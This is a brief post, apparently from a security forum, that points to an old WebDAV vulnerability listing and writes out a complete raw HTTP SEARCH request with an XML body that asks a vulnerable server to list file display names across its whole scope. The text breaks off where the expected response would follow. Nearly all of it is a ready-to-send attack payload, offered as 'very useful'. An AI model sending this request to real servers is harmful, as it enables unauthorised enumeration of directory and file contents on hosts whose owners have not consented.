This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts, this is an old vuln) and is very useful:

Send this:

SEARCH / HTTP/1.1  
Host: target  
Content-Type: text/xml  
Content-Length: 133  
  
<?xml version="1.0"?>  
<g:searchrequest xmlns:g="DAV:">  
<g:sql>  
Select "DAV:displayname" from scope()  
</g:sql>  
</g:searchrequest>


And expect something like this back: